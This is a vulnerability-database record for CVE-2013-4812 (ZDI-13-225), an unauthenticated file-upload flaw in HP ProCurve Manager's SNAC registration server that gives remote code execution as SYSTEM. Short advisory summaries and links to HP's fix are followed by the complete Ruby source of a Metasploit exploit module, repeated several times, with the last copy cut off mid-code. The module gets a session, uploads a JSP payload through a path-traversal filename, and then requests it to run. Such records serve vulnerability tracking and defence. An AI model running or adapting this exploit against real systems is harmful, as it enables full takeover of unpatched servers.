HP PCM+ SNAC Registration Server UpdateCertificatesServlet Remote Code Execution Vulnerability
2013-09-11T00:00:00
ID ZDI-13-225 Type zdi Reporter Andrea Micalizzi aka rgod Modified 2013-11-09T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the UpdateCertificatesServlet. This servlet improperly sanitizes the 'fileName' argument allowing the remote attacker could upload a .jsp file. This can result in remote code execution under the context of the SYSTEM user.
{"hash": "2783c5b565640821f2a5916d167767fc7d38117bbd4c0e982f041ccda6cf778c", "edition": 2, "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the UpdateCertificatesServlet. This servlet improperly sanitizes the 'fileName' argument allowing the remote attacker could upload a .jsp file. This can result in remote code execution under the context of the SYSTEM user.", "viewCount": 3, "objectVersion": "1.2", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "2435c746c04165a32d4c0f8f239b8669", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "db50b42baca7f327ce97266f78000fac", "key": "description"}, {"hash": "06dabdbdb5138676c665a25f0983fcf6", "key": "href"}, {"hash": "b7fd0bad9a3db89554b13b658b53fddb", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "c1d229ae9f803a652925c00bf477de33", "key": "published"}, {"hash": "98e3f62180841e3981209bfae6e9ca29", "key": "references"}, {"hash": "84bda8f6b50a35b9d7d4cd126b3ef35e", "key": "reporter"}, {"hash": "c917563d844e9d5b1a286828981f0f2e", "key": "title"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}], "cvelist": ["CVE-2013-4812"], "bulletinFamily": "info", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-225", "history": [{"bulletin": {"hash": "fd1fb45ac260ef12296e1406a24ab4a3edf6a4d25561e9c3f145ab9859e76d31", "id": "ZDI-13-225", "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the UpdateCertificatesServlet. This servlet improperly sanitizes the 'fileName' argument allowing the remote attacker could upload a .jsp file. This can result in remote code execution under the context of the SYSTEM user.", "viewCount": 0, "objectVersion": "1.2", "hashmap": [{"hash": "98e3f62180841e3981209bfae6e9ca29", "key": "references"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}, {"hash": "de25676891f23b04ab869e6e7840e9a3", "key": "modified"}, {"hash": "84bda8f6b50a35b9d7d4cd126b3ef35e", "key": "reporter"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "2435c746c04165a32d4c0f8f239b8669", "key": "cvelist"}, {"hash": "06dabdbdb5138676c665a25f0983fcf6", "key": "href"}, {"hash": "db50b42baca7f327ce97266f78000fac", "key": "description"}, {"hash": "c1d229ae9f803a652925c00bf477de33", "key": "published"}, {"hash": "c917563d844e9d5b1a286828981f0f2e", "key": "title"}], "cvelist": ["CVE-2013-4812"], "bulletinFamily": "info", "published": "2013-09-11T00:00:00", "references": ["https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "reporter": "Andrea Micalizzi aka rgod", "lastseen": "2016-09-04T11:33:55", "history": [], "modified": "2013-09-04T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-225", "type": "zdi"}, "lastseen": "2016-09-04T11:33:55", "edition": 1, "differentElements": ["modified"]}], "id": "ZDI-13-225", "reporter": "Andrea Micalizzi aka rgod", "published": "2013-09-11T00:00:00", "references": ["https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409"], "lastseen": "2016-11-09T00:18:07", "modified": "2013-11-09T00:00:00", "enchantments": {"score": {"value": 9.2, "vector": "NONE", "modified": "2016-11-09T00:18:07"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4812"]}, {"type": "dsquare", "idList": ["E-349"]}, {"type": "saint", "idList": ["SAINT:279F95372544AFCA3000201D14830112", "SAINT:D7E7AE713FCC306B414BDDDCF928FB38", "SAINT:66194A0423C6048B45F3300165835412"]}, {"type": "zdt", "idList": ["1337DAY-ID-21240"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123255"]}, {"type": "d2", "idList": ["D2SEC_HPPCM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_PCM_SNAC_UPDATE_CERTIFICATES"]}, {"type": "exploitdb", "idList": ["EDB-ID:28337"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13282", "SECURITYVULNS:VULN:13501", "SECURITYVULNS:DOC:29808", "SECURITYVULNS:DOC:30182"]}], "modified": "2016-11-09T00:18:07"}, "vulnersScore": 9.2}, "type": "zdi"}
{"cve": [{"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "UpdateCertificatesServlet in the SNAC registration server in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 does not properly validate the fileName argument, which allows remote attackers to upload .jsp files and consequently execute arbitrary code via unspecified vectors, aka ZDI-CAN-1743.", "modified": "2013-09-26T03:52:00", "id": "CVE-2013-4812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4812", "published": "2013-09-16T13:01:00", "title": "CVE-2013-4812", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "File upload vulnerability in HP PCM+ SNAC Registration Server UpdateCertificatesServlet\n\nVulnerability Type: File Upload", "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "id": "E-349", "href": "", "type": "dsquare", "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-10-03T00:00:00", "published": "2013-10-03T00:00:00", "id": "SAINT:279F95372544AFCA3000201D14830112", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-10-03T00:00:00", "published": "2013-10-03T00:00:00", "id": "SAINT:D7E7AE713FCC306B414BDDDCF928FB38", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:28", "bulletinFamily": "exploit", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-10-03T00:00:00", "published": "2013-10-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "id": "SAINT:66194A0423C6048B45F3300165835412", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:17", "bulletinFamily": "exploit", "description": "", "modified": "2013-09-17T00:00:00", "published": "2013-09-17T00:00:00", "href": "https://packetstormsecurity.com/files/123255/HP-ProCurve-Manager-SNAC-UpdateCertificatesServlet-File-Upload.html", "id": "PACKETSTORM:123255", "type": "packetstorm", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload', \n'Description' => %q{ \nThis module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The \nvulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary \nfiles, just having into account binary writes aren't allowed. Additionally, authentication \ncan be bypassed in order to upload the file. This module has been tested successfully on \nthe SNAC server installed with HP ProCurve Manager 4.0. \n}, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-4812' ], \n[ 'OSVDB', '97155' ], \n[ 'BID', '62348' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'HP ProCurve Manager 4.0 SNAC Server', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'DisclosureDate' => 'Sep 09 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443) \n], self.class ) \nend \n \ndef check \nsession = get_session \nif session.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({ \n'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\", \n'cookie' => session \n}) \n \nif res and res.code == 200 and res.body =~ /\"success\":\"true\"/ \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef get_session \nres = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" }) \nsession = nil \nif res and res.code == 200 \nsession = res.get_cookies \nend \n \nif session and not session.empty? \nreturn session \nend \n \nreturn nil \nend \n \ndef exploit_upload(session) \njsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\" \nrand_password = rand_text_alpha(4 + rand(10)) \npost_message = Rex::MIME::Message.new \npost_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\") \npost_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\") \npost_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\") \npost_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\") \ndata = post_message.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\", \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\", \n'cookie' => session, \n'data' => data, \n}) \n \nif res and res.code == 200 and res.body =~ /Certificate import fails/ \nreturn jsp_name \nend \n \nreturn nil \nend \n \ndef peer \nreturn \"#{rhost}:#{rport}\" \nend \n \ndef exploit \nprint_status(\"#{peer} - Getting a valid session...\") \nsession = get_session \nif session.nil? \nfail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\") \nend \n \nprint_status(\"#{peer} - Uploading payload...\") \njsp = exploit_upload(session) \nunless jsp \nfail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload...\") \nsend_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" }) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123255/hp_pcm_snac_update_certificates.rb.txt"}], "zdt": [{"lastseen": "2018-03-14T10:21:16", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This Metasploit module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0.", "modified": "2013-09-17T00:00:00", "published": "2013-09-17T00:00:00", "id": "1337DAY-ID-21240", "href": "https://0day.today/exploit/description/21240", "type": "zdt", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\r\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\r\n files, just having into account binary writes aren't allowed. Additionally, authentication\r\n can be bypassed in order to upload the file. This module has been tested successfully on\r\n the SNAC server installed with HP ProCurve Manager 4.0.\r\n },\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-4812' ],\r\n [ 'OSVDB', '97155' ],\r\n [ 'BID', '62348' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'DisclosureDate' => 'Sep 09 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443)\r\n ], self.class )\r\n end\r\n\r\n def check\r\n session = get_session\r\n if session.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\",\r\n 'cookie' => session\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /\"success\":\"true\"/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_session\r\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\r\n session = nil\r\n if res and res.code == 200\r\n session = res.get_cookies\r\n end\r\n\r\n if session and not session.empty?\r\n return session\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def exploit_upload(session)\r\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\r\n rand_password = rand_text_alpha(4 + rand(10))\r\n post_message = Rex::MIME::Message.new\r\n post_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\r\n post_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\")\r\n post_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\")\r\n post_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\")\r\n data = post_message.to_s\r\n data.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\r\n 'cookie' => session,\r\n 'data' => data,\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Certificate import fails/\r\n return jsp_name\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Getting a valid session...\")\r\n session = get_session\r\n if session.nil?\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading payload...\")\r\n jsp = exploit_upload(session)\r\n unless jsp\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" })\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21240"}], "exploitdb": [{"lastseen": "2016-02-03T07:56:11", "bulletinFamily": "exploit", "description": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload. CVE-2013-4812. Remote exploit for windows platform", "modified": "2013-09-17T00:00:00", "published": "2013-09-17T00:00:00", "id": "EDB-ID:28337", "href": "https://www.exploit-db.com/exploits/28337/", "type": "exploitdb", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\r\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\r\n files, just having into account binary writes aren't allowed. Additionally, authentication\r\n can be bypassed in order to upload the file. This module has been tested successfully on\r\n the SNAC server installed with HP ProCurve Manager 4.0.\r\n },\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-4812' ],\r\n [ 'OSVDB', '97155' ],\r\n [ 'BID', '62348' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'DisclosureDate' => 'Sep 09 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443)\r\n ], self.class )\r\n end\r\n\r\n def check\r\n session = get_session\r\n if session.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\",\r\n 'cookie' => session\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /\"success\":\"true\"/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_session\r\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\r\n session = nil\r\n if res and res.code == 200\r\n session = res.get_cookies\r\n end\r\n\r\n if session and not session.empty?\r\n return session\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def exploit_upload(session)\r\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\r\n rand_password = rand_text_alpha(4 + rand(10))\r\n post_message = Rex::MIME::Message.new\r\n post_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\r\n post_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\")\r\n post_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\")\r\n post_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\")\r\n data = post_message.to_s\r\n data.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\r\n 'cookie' => session,\r\n 'data' => data,\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Certificate import fails/\r\n return jsp_name\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Getting a valid session...\")\r\n session = get_session\r\n if session.nil?\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading payload...\")\r\n jsp = exploit_upload(session)\r\n unless jsp\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" })\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/28337/"}], "d2": [{"lastseen": "2019-05-29T19:19:06", "bulletinFamily": "exploit", "description": "**Name**| d2sec_hppcm \n---|--- \n**CVE**| CVE-2013-4812 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP PCM+ SNAC Registration Server Remote Code Execution Vulnerability \n**Notes**| \n", "modified": "2013-09-16T13:01:00", "published": "2013-09-16T13:01:00", "id": "D2SEC_HPPCM", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hppcm", "title": "DSquare Exploit Pack: D2SEC_HPPCM", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-10-08T12:20:41", "bulletinFamily": "exploit", "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0.\n", "modified": "2017-07-24T13:26:21", "published": "2013-09-13T21:40:28", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_PCM_SNAC_UPDATE_CERTIFICATES", "href": "", "type": "metasploit", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload',\n 'Description' => %q{\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.\n },\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-4812' ],\n [ 'OSVDB', '97155' ],\n [ 'BID', '62348' ],\n [ 'ZDI', '13-225' ]\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => ARCH_JAVA,\n 'DefaultOptions' =>\n {\n 'SHELL' => 'cmd.exe',\n 'SSL' => true\n },\n 'Targets' =>\n [\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 09 2013'))\n\n register_options(\n [\n Opt::RPORT(443)\n ])\n end\n\n def check\n session = get_session\n if session.nil?\n return Exploit::CheckCode::Safe\n end\n\n res = send_request_cgi({\n 'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\",\n 'cookie' => session\n })\n\n if res 